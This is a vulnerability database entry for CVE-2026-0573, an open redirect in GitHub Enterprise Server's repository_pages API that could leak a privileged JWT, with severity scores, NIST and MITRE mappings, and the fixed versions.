CVE-2026-0573

Critical

Published: 18 February 2026

Published

18 February 2026

Modified

19 February 2026

KEV Added

—

Patch

—

CVSS Score 9.0 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

EPSS Score 0.0007 20.6th percentile

Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-0573 is a critical-severity Open Redirect (CWE-601) vulnerability in Github Enterprise Server. Its CVSS base score is 9.0 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 20.6th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)AI

SI-2 Flaw Remediation good match

prevent

Timely flaw remediation directly patches the insecure HTTP redirect handling in the repository_pages API, preventing authorization token leakage.

SI-10 Information Input Validation good match

prevent

Validating artifact URLs and HTTP redirects ensures only trusted domains are followed, blocking attacker-controlled redirects.

SC-7 Boundary Protection partial match

prevent

Boundary protection mechanisms inspect and filter outbound API requests to unauthorized domains, mitigating redirect-based token exfiltration.

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

attack.mitre.org →

Why these techniques?

Open redirect in public-facing GitHub Enterprise API directly enables exploitation of the server to steal JWT tokens (T1190).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated…

user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.

Deeper analysisAI

CVE-2026-0573 is an open URL redirection vulnerability (CWE-601) in GitHub Enterprise Server's repository_pages API. The API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header that contained a privileged JWT token. This issue affected all versions of GitHub Enterprise Server prior to 3.19.

An authenticated user with access to the target GitHub Enterprise Server instance could exploit this vulnerability by leveraging a legacy redirect mechanism to direct requests to an attacker-controlled domain. This allowed the attacker to exfiltrate the Actions.ManageOrgs JWT token from the preserved authorization header, which could then be leveraged for potential remote code execution.

GitHub addressed the vulnerability in backported patches across multiple release branches, including versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. Security practitioners should upgrade to one of these fixed versions, as detailed in the corresponding GitHub Enterprise Server release notes. The issue was reported through the GitHub Bug Bounty program.